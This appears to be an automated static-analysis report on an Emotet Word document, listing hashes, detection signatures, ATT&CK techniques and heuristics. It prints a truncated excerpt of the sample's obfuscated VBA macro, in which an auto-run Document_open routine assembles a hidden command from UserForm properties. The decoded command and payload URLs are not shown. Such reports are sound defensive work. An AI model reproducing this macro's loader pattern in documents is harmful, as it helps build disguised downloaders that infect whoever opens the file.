Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 76e0810861a19814…

MALICIOUS

Office (OLE)

Size: 188.2 KB
Created: 2019-12-16 10:56:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: c12e6c159002534a2339ad6683f97a56
SHA-1: b5afdb654a4724e7d35fa1fe7638a4e257cb63a9
SHA-256: 76e0810861a19814f0d6d89258f6332249f6b9737cd92809fee36ee4e4ea3da5
Risk score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7458509-0, indicating it is likely part of the Emotet family. Critical heuristics indicate the presence of a VBA UserForm hidden-property command stager designed for auto-execution via the Document_open macro, which uses CreateObject and GetObject calls. This suggests the macro's primary function is to download and execute a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7458509-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7458509-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8224 bytes
SHA-256: 103cc589812bba8725f1d32621b0b7a0c70b003d2aeb5b7f3647bb15e82003c0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Wpcelcnm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Tkeunwzdjusza, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      Dim Vkfpqytfyyrsu
      Dim Yybnowzai
      For Sjfskvhxnyrhb = Csdnbnzqmoun To 0
         Wfmshbyurpprl = xPI
         Jwsugkzgnwkwn = CDbl(3)
         Qacpaunqp = Tan(MyeW5A)
         Ondvdvurouoh = 4 - Wyzwxelkjyp
         Cbwfcynvldrtp = (3 - Vnbtyadvousr)
         Eegnysps = Iqtkvhchcp
         Wvqwyghlkherh = CDbl(6)
         Fqjgdypkih = Tan(Hrkpsphikxbui)
      Next
      Dim Epygvdyqpas
      Dim Viklcxhl
      For Fquwlfizdcy = Csdnbnzqmoun To 0
         Lvmvamrvwabr = xPI
         Hynceiatpbhn = CDbl(3)
         Bpzcxnzqq = Tan(MyeW5A)
         Yetiqsebm = 4 - Patpurfk
         Bkthbzuwtqi = (3 - Gdhlzjclzfaz)
         Ithkfntxuz = Tkesksdfnlm
         Bmbcesicq = CDbl(6)
         Mgczbijh = Tan(Prhhvivtuw)
      Next
      Dim Bntqswtftvfud
      Dim Nndktfjbfq
      For Vzovyivelg = Csdnbnzqmoun To 0
         Jkbpjpgo = xPI
         Dtbvfsslna = CDbl(3)
         Ygfzgmiozg = Tan(MyeW5A)
         Bjdtspkkwlvut = 4 - Dlzsplwm
         Jiugyjwuct = (3 - Ytxpipmklgd)
         Daniofxik = Qexczzrjh
         Fuacgakydfk = CDbl(6)
         Jimnoyfolqzes = Tan(Lotcpqvsil)
      Next
Sjjfkjzcfls
End Sub

Attribute VB_Name = "Xrfpydxbfk"
Attribute VB_Base = "0{E8D6A6C6-2BAF-4D05-B16A-00A79C17EEA2}{A3253E34-5D61-4D49-B0EB-C485ED4777B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ueqdsoufggvs"
Function Elbvfewbxtip()
      Dim Yzdqenohomavo
      Dim Iepyxmulumis
      For Vmzarkiv = Csdnbnzqmoun To 0
         Chihsaonym = xPI
         Zqkjenjdvuce = CDbl(3)
         Bvxvmmwc = Tan(MyeW5A)
         Ensuyvuajdm = 4 - Hgumfqhfens
         Qcahvxuueruo = (3 - Abupnrep)
         Zrlojazaveer = Ipovcpzy
         Hdjyfgoanih = CDbl(6)
         Gkesutavic = Tan(Xdjnzsbqv)
      Next
Otuzexnwdaa = Wpcelcnm.Tkeunwzdjusza
      Dim Ojhymdixps
      Dim Gnuzzpljoe
      For Cvjxaxnniyya = Csdnbnzqmoun To 0
         Cwgszqfzzrfq = xPI
         Fjyjypwru = CDbl(3)
         Semeiotwhmodv = Tan(MyeW5A)
         Mcvsrjtjiyzo = 4 - Vlcuvhmsvqc
         Wrqgcedcuvbt = (3 - Vefjaqilblizy)
         Gepfowrrswkz = Paahiroq
         Vmlqfxcg = CDbl(6)
         Orlozcdnmm = Tan(Xklkhspqfqw)
      Next
Fbkkbllyh = Otuzexnwdaa + Xrfpydxbfk.Xqydzwclglloa + Xrfpydxbfk.Auittfls + Xrfpydxbfk.Tbqpogqafxre
      Dim Yuagbzltvajh
      Dim Mizowiiepx
      For Eaxdnthdtkig = Csdnbnzqmoun To 0
         Dkvfcheqzvadx = xPI
         Tfcliulwrn = CDbl(3)
         Cqczsqxf = Tan(MyeW5A)
         Junoobcdjv = 4 - Zeguoeroesmh
         Wvhnzolkwixug = (3 - Oduniqxtybto)
         Qhgmoegww = Ioixwuyhuposu
         Ybjlgadgfa = CDbl(6)
         Rfnsgzozc = Tan(Bhvgnobpmtfgf)
      Next
Wohzgfledt = Fbkkbllyh + Xrfpydxbfk.Scueqyzrze + Xrfpydxbfk.Dakwruximp
      Dim Ixpjzknxpm
      Dim Zohlddmlvy
      For Gzgosznz = Csdnbnzqmoun To 0
         Yfphqoydhiaq = xPI
         Bdwikvqkeocae = CDbl(3)
         Pzdrfqbww = Tan(MyeW5A)
         Mrqlapghnoceo = 4 - Nbaeqkzy
         Xzmizhavmj = (3 - Sontwmrnupvc)
         Vrwnntyccquzn = Icmetimr
         Mgenidkfami = CDbl(6)
         Vfvqlwzwzkklm = Tan(Jqjazzamtounj)
      Next
Elbvfewbxtip = Aqtjfpyvasena + Wohzgfledt + Aqtjfpyvasena
      Dim Xrhcbprq
      Dim Jyfsevqpi
      For Utljxmnqhmqx = Csdnbnzqmoun To 0
         Noeuarvois = xPI
         Hhhyvdtjdxwse = CDbl(3)
         Alssbwgqg = Tan(MyeW5A)
         Iiyfktbzffij = 4 - Dzipslqxmud
         Gbaqblbvlkxmc = (3 - Xzrbbfxwx)
         Adkwdcutuyf = Xqrspldqu
         Mcboujecpnlxk = CDbl(6)
        
... (truncated)